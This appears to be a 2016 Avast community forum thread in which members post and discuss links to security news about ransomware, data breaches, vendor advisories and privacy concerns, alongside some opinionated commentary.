The Hitler ransomware infection takes place when the user double-clicks on an infected binary. According to Bleeping Computer, this file drops a batch file on the user's system, which then drops three files called firefox32.exe, ErOne.vbs, and chrst.exe.
Good news is that Avast! also blocked the ransomware.
-
Microsoft Security Bulletin Summary for August 2016
https://technet.microsoft.com/library/security/ms16-aug
-
Researchers crack open unusually advanced malware that hid for 5 years
http://arstechnica.com/security/2016/08/researchers-crack-open-unusually-advanced-malware-that-hid-for-5-years/
-
Google study shows unwanted software worse than malware
https://thestack.com/security/2016/08/08/google-study-shows-unwanted-software-worse-than-malware/
pdf.doc > https://static.googleusercontent.com/media/research.google.com/no//pubs/archive/45487.pdf
-
Got Ransomware? Negotiate
https://labsblog.f-secure.com/2016/08/10/got-ransomware-negotiate/
pdf.doc > https://fsecureconsumer.files.wordpress.com/2016/07/customer_journey_of_crypto-ransomware_f-secure.pdf
-
new TeamSpeak 3.0.13 server has several 0-day vulnerabilities which are critical
http://seclists.org/fulldisclosure/2016/Aug/61
-
A New Wireless Hack Can Unlock 100 Million Volkswagens
https://www.wired.com/2016/08/oh-good-new-hack-can-unlock-100-million-volkswagens/ (https://www.wired.com/2016/08/oh-good-new-hack-can-unlock-100-million-volkswagens/)
-
Another good reason to block adds :
https://securelist.com/blog/incidents/75731/good-morning-android/
-
Economics Behind Ransomware as a Service: A Look at Stampado’s Pricing Model
http://blog.trendmicro.com/trendlabs-security-intelligence/the-economics-behind-ransomware-prices/
-
Why do we ignore up to 90% of computer security alerts?
http://www.tripwire.com/state-of-security/featured/security-alerts-multitasking/
-
Is this bringing Windows insecurity to linux?
"Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows."
https://technet.microsoft.com/en-us/library/bb978526.aspx
A new development: https://blogs.msdn.microsoft.com/powershell/2015/05/05/powershell-dsc-for-linux-is-now-available/
Is this going to be a linux threat like Java was on Windows?
polonus
-
The above policy can be seen in quite another light if you read this
https://en.wikipedia.org/wiki/Embrace,_extend_and_extinguish
"Embrace, extend, and extinguish",[1] also known as "Embrace, extend, and exterminate",[2] is a phrase that the U.S. Department of Justice found[3] that was used internally by Microsoft[4] to describe its strategy for entering product categories involving widely used standards, extending those standards with proprietary capabilities, and then using those differences to disadvantage its competitors.
Often quoted by MS bashers concerning the Ububtu Debian example, but we have to admit MS is not doing great lately.
In various sectors MS did badly recently, missed the train where Android was concerned. Now they act like a Win10 push-man.
Remember, one always reaps as one sowes, karma is the name of the game.
pol
-
2016 – The Year of Online Extortion
In all of 2015, we saw 29 new families of ransomware.
In the first half of 2016 alone, we’ve seen 79.
http://blog.trendmicro.com/2016-year-online-extortion-proven/
-
Whatsapp breaks two promises after being acquired by Farcebook's:
1. whatsapp gets facebook directed ads,
2. whatsapp gets further integrated into facebook.
Click read and do not accept the user license, but one has to do that (not applied as per default) within 30 days.
You also have to set to "do not share" under settings.
Now facebook algoritms have acces to your every whatsapp message,
despite of the Privacy Shield Treaty, as big commerce will anyway do as they please,
what else services besides targeted ads services will be able to read into your every whatsapp message? NSA, FBI?
Do not share with Whatsapp what you do not wanna share with others. Your data is what you pay for free services, and your privacy then stops to exist and what you share may come to bite you later.
polonus
-
Best heard reaction to the recent French-German requests/plans to undermine/outlaw encryption online to better monitor wannabee terrorists:
if crypto is outlawed, then only outlaws have crypto
polonus
-
Fantom Ransomware Encrypts your Files while pretending to be Windows Update
http://www.bleepingcomputer.com/news/security/fantom-ransomware-encrypts-your-files-while-pretending-to-be-windows-update/
http://www.neowin.net/news/fantom-ransomware-pretends-to-be-windows-update-while-it-encrypts-your-files
-
In the light of the new Whatssapp Facebook privacy threat,
read: https://ico.org.uk/about-the-ico/news-and-events/news-and-blogs/2016/08/statement-on-changes-to-whatsapp-and-facebook-s-handling-of-personal-data/
and then what ico should look into- the data farcebook sits on and their dealings both with commerce and state surveillance: http://www.zdnet.com/article/firm-facebooks-shadow-profiles-are-frightening-dossiers-on-everyone/
Hope Big Brother will not turn angry on us, frightening spying and data-slurping.
Who will check them eventually?
polonus
-
CrowdStrike Machine Learning and VirusTotal
https://www.crowdstrike.com/blog/crowdstrike-machine-learning-virustotal/
CrowdStrike detection example (First submission 2016-08-26 06:24:22 UTC ( 1 day, 3 hours ago ))
https://www.virustotal.com/en/file/f7a4a9b58e9935d28dc69f7905b4bc6b41e3d2e08d62c9ffb1d37b316d3a2eaf/analysis/
also see > https://ctovision.com/2015/10/does-next-generation-anti-virus-solve-the-fatal-flaws-of-anti-virus/
also see > https://labsblog.f-secure.com/2016/08/26/whats-the-deal-with-machine-learning/
-
Opera server breach incident
https://www.opera.com/blogs/security/2016/08/opera-server-breach-incident/
-
RIPPER ATM MALWARE AND THE 12 MILLION BAHT JACKPOT
https://www.fireeye.com/blog/threat-research/2016/08/ripper_atm_malwarea.html (https://www.fireeye.com/blog/threat-research/2016/08/ripper_atm_malwarea.html)
-
Watch out for this Phishing email
(http://screencast-o-matic.com/screenshots/u/Lh/1472589695444-64005.png)
(http://screencast-o-matic.com/screenshots/u/Lh/1472589505788-34522.png)
(http://screencast-o-matic.com/screenshots/u/Lh/1472589853992-81721.png)
I've receive the same email for Walmart, Walgreen, BurgerKing,McDonalds, Sams, Choice Home Warranty, etc., etc., etc.
-
Big mal-ad campaign halted: http://blog.talosintel.com/2016/09/shadowgate-takedown.html
pol
-
After Chrome 53 browser update, some extensions became corrupted and no longer functioned, like e.g. https everywhere.
Try to reinstall and repair, if this does not work use this as an alternative: https://chrome.google.com/webstore/detail/kb-ssl-enforcer/flcpelgcagfhfoegekianiofphddckof/related
polonus
-
Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems
http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Anti-MalwareBlog+%28Trendlabs+Security+Intelligence+Blog%29
-
CSP often wrongly configured in the live website theater, it often can be circumvented in over 94% of cases.
Read: https://speakerdeck.com/mikispag/making-csp-great-again-michele-spagnuolo-and-lukas-weichselbaum?slide=9
Content Security Policy is a web platform mechanism designed to mitigate cross-site scripting (XSS), the top security vulnerability in modern web applications. In this paper, we take a closer look at the practical benefits of adopting CSP and identify significant flaws in real-world deployments that result in bypasses in 94.72% of all distinct policies. We base our Internet-wide analysis on a search engine corpus of approximately 100 billion pages from over 1 billion hostnames; the result covers CSP deployments on 1,680,867 hosts with 26,011 unique CSP policies – the most comprehensive study to date. We introduce the security-relevant aspects of the CSP specification and provide an in-depth analysis of its threat model, focusing on XSS protections. We identify three common classes of CSP bypasses and explain how they subvert the security of a policy. We then turn to a quantitative analysis of policies deployed on the Internet in order to understand their security benefits. We observe that 14 out of the 15 domains most commonly whitelisted for loading scripts contain unsafe endpoints; as a consequence, 75.81% of distinct policies use script whitelists that allow attackers to bypass CSP. In total, we find that 94.68% of policies that attempt to limit script execution are ineffective, and that 99.34% of hosts with CSP use policies that offer no benefit against XSS. Finally, we propose the ’strict-dynamic’ keyword, an addition to the specification that facilitates the creation of policies based on cryptographic nonces, without relying on domain whitelists. We discuss our experience deploying such a nonce-based policy in a complex application and provide guidance to web authors for improving their policies.
Source: https://research.google.com/pubs/pub45542.html
Complete article: https://static.googleusercontent.com/media/research.google.com/nl//pubs/archive/45542.pdf
polonus
on circumvention techniques: http://webcache.googleusercontent.com/search?q=cache:7dHCHaXZa94J:https://coolaj86.com/articles/how-to-get-around-latest-browser-security-measures/&num=1&hl=nl&gl=pl&strip=0&vwsrc=1 source AJoNeal (for security researchers only, else do not visit).
D
-
Dridex Banking Trojan Will Soon Target Crypto-Currency Wallets
http://news.softpedia.com/news/dridex-banking-trojan-will-soon-target-crypto-currency-wallets-508041.shtml
(http://news.softpedia.com/news/dridex-banking-trojan-will-soon-target-crypto-currency-wallets-508041.shtml)
http://i1-news.softpedia-static.com/images/news2/dridex-banking-trojan-will-soon-target-crypto-currency-wallets-508041-3.png
-
Rambler was hacked
https://www.leakedsource.com/blog/rambler
-
10(!) year old leak in Windows Media Player again used to spread malware :
http://blog.cyren.com/articles/windows-media-player-drm-feature-used-for-malware-delivery-again.html
DRM is supposed to let people only play legally obtained songs/movies.
It is a totally useless system if it can be used to spread illegal (malicious) content.
-
Cryptocurrency Mining Malware Discovered Targeting Seagate NAS Hard Drives
http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml?utm_content=buffer23663&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer (http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml?utm_content=buffer23663&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer)
-
The French Dark Net Is Looking for Grammar Police
http://blog.trendmicro.com/trendlabs-security-intelligence/the-french-dark-net-is-looking-for-grammar-police/
-
Everyone worldwide that uses tor or VPN or unwillingly is part of a botnet could now be hacked by the FBI,
according to procedural changes to rule 41: https://blog.torproject.org/blog/fbis-quiet-plan-begin-mass-hacking: https://www.eff.org/deeplinks/2016/06/help-us-stop-updates-rule-41
polonus
-
Armada Collective DDoS Extortion Group Now Threatens Ransomware Infections
http://news.softpedia.com/news/armada-collective-ddos-for-bitcoin-group-now-threatens-ransomware-infections-508248.shtml (http://news.softpedia.com/news/armada-collective-ddos-for-bitcoin-group-now-threatens-ransomware-infections-508248.shtml) :o
-
BkSoD by Ransomware:
HDDCryptor Uses Commercial Tools to Encrypt Network Shares and Lock HDDs
http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Anti-MalwareBlog+%28Trendlabs+Security+Intelligence+Blog%29
-
Adobe Security Bulletin
https://helpx.adobe.com/security/products/flash-player/apsb16-29.html
-
September Patch Tuesday: Browser, Exchange, Office Bugs Dominate
http://blog.trendmicro.com/trendlabs-security-intelligence/september-patch-tuesday-browser-exchange-office-bugs-dominate/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Anti-MalwareBlog+%28Trendlabs+Security+Intelligence+Blog%29
Microsoft Patches IE/Edge Zero-day Used in AdGholas Malvertising Campaign
http://blog.trendmicro.com/trendlabs-security-intelligence/microsoft-patches-ieedge-zeroday-used-in-adgholas-malvertising-campaign/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Anti-MalwareBlog+%28Trendlabs+Security+Intelligence+Blog%29
-
Finnish police: Keep your car keys in the fridge
http://yle.fi/uutiset/finnish_police_keep_your_car_keys_in_the_fridge/9166149
https://labsblog.f-secure.com/2016/09/15/seriously-put-away-the-foil/
-
Do not think you are safe using a tor browser! You can get malware infested by a certificate pinned altered NoScript extension for instance, because Mozilla can not protect you against such an attack: https://medium.com/@movrcx/tor-browser-exposed-anti-privacy-implantation-at-mass-scale-bd68e9eb1e95
Again a user is helpless against a direct attack from a party with enough resources (Spooks, spies whether corporational or government related - does not matter). Could it be your surveilling government organization this time - NSA, CIA, FBI or one of their global counterparts?
So refrain from sharing with the Internet that what you do not want to share with others. We have arrived in a situation where we can trust no one with our private digital information. It is all a question of trust and do you know who you can trust with your e2e encrypted info and where it lands eventually?
If you do not hide my warnings, you'd only have yourself to blame.
Three instances where we saw SSL security crumbling Consider how three recent examples involving sub-CAs being used to produce phony certificates show that the classical root certificate authority-based trust model is breaking down:
Trustwave. In 2012, Trustwave issued a sub-CA to a private organization [2]. This sub-CA was to be loaded into a device performing a man-in-the-middle attack, and its sole purpose was to allow that device to generate trusted certificates for arbitrary domains, allowing interception against all devices on the network. This approach avoided the need to install a custom root certificate across all device, and also prevented certificate warnings, by chaining the phony certificates to Trustwave.
TURKTRUST. In 2013, a sub-CA issued by TURKTRUST, a root certificate authority based in Turkey, issued a phony certificate for the google.com domain. The certificate pinning capabilities added to Chrome by Google detected this certificate in the wild [4].
ANSSI. Also in 2013, ANSSI, a root certificate authority controlled by the French government, issued a sub-CA to the French treasury department, IGC/A, and IGC/A in turn used the sub-CA to intercept and monitor employee web traffic [15].
quote taken from source article: case study fighting back against SSL Inspection, conducted by Jacob Thompson and directed by Stephen Bono.
polonus (volunteer website security analyst and website eror-hunter)
-
"We have arrived in a situation where we can trust no one with our private digital information. It is all a question of trust and do you know who you can trust with your e2e encrypted info and where it lands eventually?"
We have been at this juncture for many years but no one believed those of us preaching this fact.
There were always those that thought that with enough encryption and the use of back doors, they still had an assurance of privacy.
Maybe now it's finally starting to sink in. Privacy on the internet is dead
-
Linux Security: A Closer Look at the Latest Linux Threats
http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-security-a-closer-look-at-the-latest-linux-threats
-
H1N1 Malware Adds Support for Infostealing Features, UAC Bypass
http://news.softpedia.com/news/h1n1-malware-adds-support-for-infostealing-features-uac-bypass-508408.shtml (http://news.softpedia.com/news/h1n1-malware-adds-support-for-infostealing-features-uac-bypass-508408.shtml)
-
iSpy Keylogger Returns with New Version and New Attacks
http://news.softpedia.com/news/ispy-keylogger-returns-with-new-version-and-new-attacks-508452.shtml (http://news.softpedia.com/news/ispy-keylogger-returns-with-new-version-and-new-attacks-508452.shtml)
-
Update on add-on pinning vulnerability
https://blog.mozilla.org/security/2016/09/16/update-on-add-on-pinning-vulnerability/
-
Malvertising Campaign Using RIG EK Detected Pushing CrypMIC Ransomware
http://news.softpedia.com/news/malvertising-campaign-using-rig-ek-detected-pushing-crypmic-ransomware-508475.shtml (http://news.softpedia.com/news/malvertising-campaign-using-rig-ek-detected-pushing-crypmic-ransomware-508475.shtml)
-
Over 840,000 Cisco Devices Affected by NSA-Linked Flaw
http://www.securityweek.com/over-840000-cisco-devices-affected-nsa-linked-flaw (http://www.securityweek.com/over-840000-cisco-devices-affected-nsa-linked-flaw)
-
Paying attention to these threats for years now at the "virus and worms",
now also mentioned here:
https://blog.sucuri.net/2016/09/hacked-website-report-2016q2.html
7000 WP sites hacked lately.
PDF report available from link given,
polonus (volunteer website security analyst and website error-hunter)
-
According to TrendMicro 71% of known ransomware families arrive as mail attachments
http://blog.trendmicro.com/trendlabs-security-intelligence/rar-javascript-ransomware-figures-fluctuations-email-attachments/
always upload and test attachments at a online multiengine scanner before you open
www.virustotal.com
www.metadefender.com
www.jotti.org
-
Yahoo Confirms At Least 500 Million Accounts Were Hacked
http://fortune.com/2016/09/22/yahoo-hack/
http://money.cnn.com/2016/09/22/technology/yahoo-data-breach/
http://www.nbcnews.com/tech/tech-news/your-yahoo-account-was-probably-hacked-company-set-confirm-massive-n652586
-
Qadars Trojan Returns Bigger and Badder than Ever Before
http://news.softpedia.com/news/qadars-trojan-returns-bigger-and-badder-than-ever-before-508546.shtml (http://news.softpedia.com/news/qadars-trojan-returns-bigger-and-badder-than-ever-before-508546.shtml)
-
Drupal Core - Critical - Multiple Vulnerabilities - SA-CORE-2016-004
https://www.drupal.org/SA-CORE-2016-004
-
OpenSSL Security Advisory [22 Sep 2016]
https://www.openssl.org/news/secadv/20160922.txt
-
Krebs Website Hit By 620 Gbps DDoS Attack :o
http://www.infosecurity-magazine.com/news/krebs-website-hit-by-620-gbps-ddos/ (http://www.infosecurity-magazine.com/news/krebs-website-hit-by-620-gbps-ddos/)
-
Yahoo Confirms At Least 500 Million Accounts Were Hacked
http://fortune.com/2016/09/22/yahoo-hack/
http://money.cnn.com/2016/09/22/technology/yahoo-data-breach/
http://www.nbcnews.com/tech/tech-news/your-yahoo-account-was-probably-hacked-company-set-confirm-massive-n652586
This is from the BBC
http://www.bbc.com/news/world-us-canada-37447016
-
Yahoo Confirms At Least 500 Million Accounts Were Hacked
http://fortune.com/2016/09/22/yahoo-hack/
http://money.cnn.com/2016/09/22/technology/yahoo-data-breach/
http://www.nbcnews.com/tech/tech-news/your-yahoo-account-was-probably-hacked-company-set-confirm-massive-n652586
<snip>
The problem being this is from 2014 - so that horse has bolted long ago - if your data got stolen then it's probably a little late.
-
Research: AV vendor's privacy policy:
https://www.av-test.org/en/news/news-single-view/data-protection-or-virus-protection/
All AV vendors share your data with third parties.
If its free, you are the product.
If it aint free you are still the product anyway!!
polonus
-
Research: AV vendor's privacy policy:
https://www.av-test.org/en/news/news-single-view/data-protection-or-virus-protection/
All AV vendors share your data with third parties.
If its free, you are the product.
If it aint free you are still the product anyway!!
polonus
What about Avast!?@polonus :D
-
Research: AV vendor's privacy policy:
https://www.av-test.org/en/news/news-single-view/data-protection-or-virus-protection/
All AV vendors share your data with third parties.
If its free, you are the product.
If it aint free you are still the product anyway!!
polonus
What about Avast!?@polonus :D
They have an Avast Free Privacy Policy and a VPN Privacy Policy: they share a lot of things: https://www.reddit.com/r/technology/comments/3lass7/avasts_privacy_policy_also_states_that_they_share/
Main and solely third partner = Google (Google Tag Manager) - they say they only use your private data statistically, but as Google has acces and on android Google Admob, it is out of sight and Google can sit on it and sell it or turn it over to surveillance if requested and under gag-order),
pol
-
Research: AV vendor's privacy policy:
https://www.av-test.org/en/news/news-single-view/data-protection-or-virus-protection/ (https://www.av-test.org/en/news/news-single-view/data-protection-or-virus-protection/)
All AV vendors share your data with third parties.
If its free, you are the product.
If it aint free you are still the product anyway!!
polonus
What about Avast!?@polonus :D
They have an Avast Free Privacy Policy and a VPN Privacy Policy: they share a lot of things: https://www.reddit.com/r/technology/comments/3lass7/avasts_privacy_policy_also_states_that_they_share/ (https://www.reddit.com/r/technology/comments/3lass7/avasts_privacy_policy_also_states_that_they_share/)
Main and solely third partner = Google (Google Tag Manager) - they say they only use your private data statistically, but as Google has acces and on android Google Admob, it is out of sight and Google can sit on it and sell it or turn it over to surveillance if requested and under gag-order),
pol
I prefer this link: https://www.avast.com/en-us/privacy-policy . It's up to date.
The one you posted gives a chopped up excerpt from a year old forum post. :)
-
MarsJoke Ransomware Targets the Government and K-12 Educational Sector
http://news.softpedia.com/news/marsjoke-ransomware-targets-the-government-and-k-12-educational-sector-508608.shtml (http://news.softpedia.com/news/marsjoke-ransomware-targets-the-government-and-k-12-educational-sector-508608.shtml)
-
Is the cure worse than the initial problem?
CloudfFlare now offers a solution to the so-called mixed content problem: http://forums.theregister.co.uk/forum/1/2016/09/20/cloudflare_offers_encryption_up_the_wazoo/
Re-writing every link as HTTPS Everywhere where they could, and where they cannot the green padlock is misleading.
They hope soon all of the internet has turned HTTPS Everywhere.
For the record the El Reg is also on American CloudFlare,
and they also dealt an additional little smear to tor-developers, in their article.
By the way CloudFlare implemented their own certificate incorrectly:
Would you trust them with half-baked e2e encryption?
From the crypto-report:
Certificate is not installed correctly
cloudflare.com
This is not a Symantec certificate.
Please contact the Certificate Authority for further verification.
You have 2 errors
RSA wrong certificate installed.
The domain name does not match the certificate common name or SAN.
ECC wrong certificate installed.
The domain name does not match the certificate common name or SAN.
Info
BEAST
This server is vulnerable to a BEAST attack. More information.
Chain installation:
2 certificates found: RSA and ECC.
To view each certificate chain, click a tab below.
RSA
ECC
Certificate information
This server uses an Extended Validation (EV) certificate. Information about the site owner has been fully validated by COMODO CA Limited to help secure personal and financial information.
Common name:
SAN:
cloudflare.com, www.cloudflare.com
Valid from:
2015-Dec-01 00:00:00 GMT
Valid to:
2016-Nov-30 23:59:59 GMT
Certificate status:
Valid
Revocation check method:
OCSP
Organization:
CloudFlare, Inc.
Organizational unit:
COMODO EV Multi-Domain SSL
City/locality:
San Francisco
State/province:
California
Country:
US
Certificate Transparency:
Embedded in certificate
Serial number:
e3bb289893780deab01913b0a1400d77
Algorithm type:
SHA256withRSA
Key size:
2048
polonus
-
Over 850,000 Devices Affected by Unpatched Cisco Zero-Day
http://news.softpedia.com/news/over-840-000-devices-affected-by-unpatched-cisco-zero-day-508630.shtml (http://news.softpedia.com/news/over-840-000-devices-affected-by-unpatched-cisco-zero-day-508630.shtml)
-
Free speech under fire where you do not expect it:
http://arstechnica.com/security/2016/09/why-the-silencing-of-krebsonsecurity-opens-a-troubling-chapter-for-the-net/
IOT devices turned against us!
polonus
-
Free speech under fire where you do not expect it:
http://arstechnica.com/security/2016/09/why-the-silencing-of-krebsonsecurity-opens-a-troubling-chapter-for-the-net/
IOT devices turned against us!
polonus
Brian Krebs reports Google is now protecting him:
https://krebsonsecurity.com/2016/09/the-democratization-of-censorship/ (https://krebsonsecurity.com/2016/09/the-democratization-of-censorship/)
Today, I am happy to report that the site is back up — this time under Project Shield, a free program run by Google to help protect journalists from online censorship. And make no mistake, DDoS attacks — particularly those the size of the assault that hit my site this week — are uniquely effective weapons for stomping on free speech, for reasons I’ll explore in this post.
-
Free VPN or MIM-server? Read: http://lifehacker.com/stop-opera-s-new-vpn-from-leaking-your-ip-address-1773359437
They use surfeasy there. Read: https://www.surfeasy.com/privacy_policy/
polonus
-
New PonyForx Infostealer Malware Sold on Russian Hacking Forums
http://news.softpedia.com/news/new-ponyforx-infostealer-malware-sold-on-russian-hacking-forums-508661.shtml (http://news.softpedia.com/news/new-ponyforx-infostealer-malware-sold-on-russian-hacking-forums-508661.shtml)
-
The Donald Trump Ransomware tries to Build Walls around your Files
http://www.bleepingcomputer.com/news/security/the-donald-trump-ransomware-tries-to-build-walls-around-your-files/ (http://www.bleepingcomputer.com/news/security/the-donald-trump-ransomware-tries-to-build-walls-around-your-files/)
-
OpenSSL Security Advisory [22 Sep 2016]
https://www.openssl.org/news/secadv/20160922.txt
OpenSSL Security Advisory [26 Sep 2016]
https://www.openssl.org/news/secadv/20160926.txt
-
MarsJoke Launches a New Ransomware Approach
http://www.infosecurity-magazine.com/news/marsjoke-launches-a-new-ransomware/ (http://www.infosecurity-magazine.com/news/marsjoke-launches-a-new-ransomware/)
-
PoS Malware: Old Dog Learns New Tricks
http://blog.trendmicro.com/pos-malware-old-dog-learns-new-tricks/
-
MarsJoke Launches a New Ransomware Approach
http://www.infosecurity-magazine.com/news/marsjoke-launches-a-new-ransomware/ (http://www.infosecurity-magazine.com/news/marsjoke-launches-a-new-ransomware/)
MarsJoke ransomware targets US government organisations, gives victims 96 hours to pay up before deleting files
http://www.ibtimes.co.uk/marsjoke-ransomware-targets-us-government-organisations-gives-victims-96-hours-pay-before-1583555
-
Inside Arizona’s Pump Skimmer Scourge
https://krebsonsecurity.com/2016/09/inside-arizonas-pump-skimmer-scourge/#more-36478 (https://krebsonsecurity.com/2016/09/inside-arizonas-pump-skimmer-scourge/#more-36478)
Gas pump skimming is on the rise everywhere.
-
Brazilian Hospitals Infected with Ransomware After RDP Brute-Force Attacks
http://news.softpedia.com/news/brazilian-hospitals-infected-with-ransomware-after-rdp-brute-force-attacks-508807.shtml (http://news.softpedia.com/news/brazilian-hospitals-infected-with-ransomware-after-rdp-brute-force-attacks-508807.shtml)
-
Sneaky JavaScript Waits for User Interaction Before Infecting Them with Malware
http://news.softpedia.com/news/sneaky-javascript-waits-for-user-interaction-before-infecting-them-with-malware-508827.shtml (http://news.softpedia.com/news/sneaky-javascript-waits-for-user-interaction-before-infecting-them-with-malware-508827.shtml)
-
Safe on tor. No, your DNS data may help to deanonymize you!
Read: http://www.securityweek.com/dns-data-can-help-attackers-deanonymize-tor-users
and https://freedom-to-tinker.com/2016/09/29/the-effect-of-dns-on-tors-anonymity/
Check: http://simpledns.com/lookup.aspx & http://www.dnsinspect.com/
polonus
-
Use Spotify? You May Have Been Infected With Malware
http://www.makeuseof.com/tag/use-spotify-infected-malware/
http://www.theregister.co.uk/2016/10/06/spotify_malware_free_music_service/
-
Hacked Steam accounts spreading Remote Access Trojan
http://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/
-
Target Czech-speaking countries, lock screen and pc and encrypts files and adds the extension .k0stya C partition, the D partition is clean!
Kostya Ransomware adds the extension .k0stya!Demonstration of attack video review.
https://youtu.be/Sti6F_VqC7Q (https://youtu.be/Sti6F_VqC7Q)
Is Avast! ready to deal with this ransomware?!!! :-\
-
List of 5900 webshops that have criminals skimming your creditcards : https://gist.github.com/gwillem/41084af200e0e5a8455681fa5858f5cc
Info credits: Willem de Groot, who has put this list online.
polonus
-
https://www.hackread.com/winrar-truecrypt-installer-dropping-malware/
-
List of 5900 webshops that have criminals skimming your creditcards : https://gist.github.com/gwillem/41084af200e0e5a8455681fa5858f5cc
Info credits: Willem de Groot, who has put this list online.
polonus
5900 online stores found skimming > https://gwillem.github.io/2016/10/11/5900-online-stores-found-skimming/
-
Microsoft Security Bulletin Summary for October 2016
https://technet.microsoft.com/library/security/ms16-oct
-
EFF warns against some use of Whatsapp,
read]: https://ssd.eff.org/en
Be aware of the Whatsapp cloud, it does not have e2e.
Be aware of malicious update-messages. These are viruses.
We advise you here not to share with the Interwebs,
that what you would not be eager to share with members of the general public.
If it is fit for everyone to read, you have less to worry.
Do not let your utterings come to bite you later.
Yes everything is being monitored,
and yes, politically correct censorship already exists.
polonus
-
Not nice when your personal data have been spilled...http://www.theregister.co.uk/2016/10/13/us_data_aggregator_megabreach/
They failed to check here: https://haveibeenpwned.com/
polonus
-
Several Exploit Kits Now Deliver Cerber 4.0
http://blog.trendmicro.com/trendlabs-security-intelligence/several-exploit-kits-now-deliver-cerber-4-0/
-
Exotic Ransomware Author Tries to be Friends with Security Researchers
http://news.softpedia.com/news/exotic-ransomware-author-tries-to-be-friends-with-security-researchers-509339.shtml (http://news.softpedia.com/news/exotic-ransomware-author-tries-to-be-friends-with-security-researchers-509339.shtml)
-
TrickBot Shows Strong Connection to Old Dyre Banking Trojan
http://news.softpedia.com/news/trickbot-shows-strong-connection-to-old-dyre-banking-trojan-509344.shtml (http://news.softpedia.com/news/trickbot-shows-strong-connection-to-old-dyre-banking-trojan-509344.shtml)
-
List of 5900 webshops that have criminals skimming your creditcards : https://gist.github.com/gwillem/41084af200e0e5a8455681fa5858f5cc
Info credits: Willem de Groot, who has put this list online.
Hi Pol/guys, anyone got a mirror link, seems the list is down on GitHub (404). Thanks.
-
SUPEE-8788 (Magento)
https://magento.com/security/patches/supee-8788
-
Sierra Wireless Mitigations Against Mirai Malware
https://ics-cert.us-cert.gov/alerts/ICS-ALERT-16-286-01
-
Regulators are deciding the future of Europe’s Internet right now.
https://www.savenetneutrality.eu/?from=banner&optout=true
polonus
-
Detecting Malware Outbreaks Faster Using Multiple Anti-malware Engines
https://www.opswat.com/blog/detecting-malware-outbreaks-faster-using-multiple-anti-malware-engines
-
List of 5900 webshops that have criminals skimming your creditcards : https://gist.github.com/gwillem/41084af200e0e5a8455681fa5858f5cc
Info credits: Willem de Groot, who has put this list online.
Hi Pol/guys, anyone got a mirror link, seems the list is down on GitHub (404). Thanks.
-> https://gwillem.gitlab.io/2016/10/14/github-censored-research-data/
-
List of 5900 webshops that have criminals skimming your creditcards : https://gist.github.com/gwillem/41084af200e0e5a8455681fa5858f5cc
Info credits: Willem de Groot, who has put this list online.
Hi Pol/guys, anyone got a mirror link, seems the list is down on GitHub (404). Thanks.
-> https://gwillem.gitlab.io/2016/10/14/github-censored-research-data/
Reply from F-Secure
=============================================================
We have finished analyzing the submitted URLs, and 176 of the provided URLs have been found to be malicious, for which the appropriate ratings have been added. The updated ratings shall be reflected automatically via Security Cloud otherwise known as ORSP.
==============================================================
-
@Asyn,
New link where the list resides: https://github.com/gwillem/ecommerce-malware-collection/tree/master/js
Check these with a Magento security scanner like: https://www.magereport.com/scan/?s=
and other scans in your toolchest.
enjoy, my good friends,
pol
P.S.
Nota Bene.
Mind you. This is a commercial list to sort of "lure" infested or (potentially) insecure webshop owners
to Byte.BV's security support services.
This as the creator, Willem de Groot, of the forementioned list, is also owner of this firm/hosting service,
Byte B.V. in the Netherlands. So his intentions with the list and all may differ from our intentions with it.
Just wanted to remind you of this situation, as it only seems fair to do so.
Notice polonus is a 100% purely unbiased & independant avast support forum volunteer website security specialist.
and I have no interest in this list as only for research purposes.
Seems only 176 webshops are really malicious as such.
Damian
-
@Asyn,
New link where the list resides: https://github.com/gwillem/ecommerce-malware-collection/tree/master/js
Hi pal, new (updated) list here: https://gitlab.com/gwillem/public-snippets/snippets/28813
Cheers,
Asyn
-
Thanks for that one, Asyn. Bookmarked. We're even now. ;)
Would be great to go over that list with some specific scans: http://www.domxssscanner.com/ &
san at: https://observatory.mozilla.org/
and then put the suspicious code through an unpacker for errors (bugs and insecurity).
Fact is that loads and loads of websites, especially the smaller ones, but not necessarily so,
have sloppy IT managment (update/patch management etc.),
and are therefore insecure and open to abuse/infection.
A lot of those on the Willem de G. list also comes blocked with firehol: https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_webserver.netset
Have a nice day, ye all,
polonus (volunteer website security analyst and website error-hunter)
-
WordPress sites hacked via new Marketplace plug-in zero-day:
http://labs.sucuri.net/?note=2016-10-17
Obfuscated backdoor code detected....
polonus
-
Report: the anatomy of tech support scams
https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2016/10/report-the-anatomy-of-tech-support-scams/
pdf report
https://www.malwarebytes.com/pdf/white-papers/AnatomyTechSupportScams.pdf?utm_source=blog&utm_medium=social
-
Cybercriminal skimmers find creative solution: creditcard data hidden inside image:
https://blog.sucuri.net/2016/10/magento-credit-card-swiper-exports-image.html
Scan your webshop that has Magento here to be alerted to insecurity: magereport.com/scan/?s=
We see that the so-called Willem de G. list made some researchers look a bit sharper for e-commerce site's insecurity.
All reported to Google Safe Browsing that cooperates firmly with Sucuri's.
polonus (volunteer website security analyst and website error-hunter)
-
Tens of millions of websites at risk in latest mega breach
https://www.leakedsource.com/blog/weebly/
-
Tens of millions of websites at risk in latest mega breach
https://www.leakedsource.com/blog/weebly/
WTF >:(!!! For one of my uni papers at my institute uses weebly as a source for giving us (students) lecture notes, notices, timetable, and etc etc. I will pass this info to my uni IT support and let them know. Thanks Asyn for posting this
-
Tens of millions of websites at risk in latest mega breach
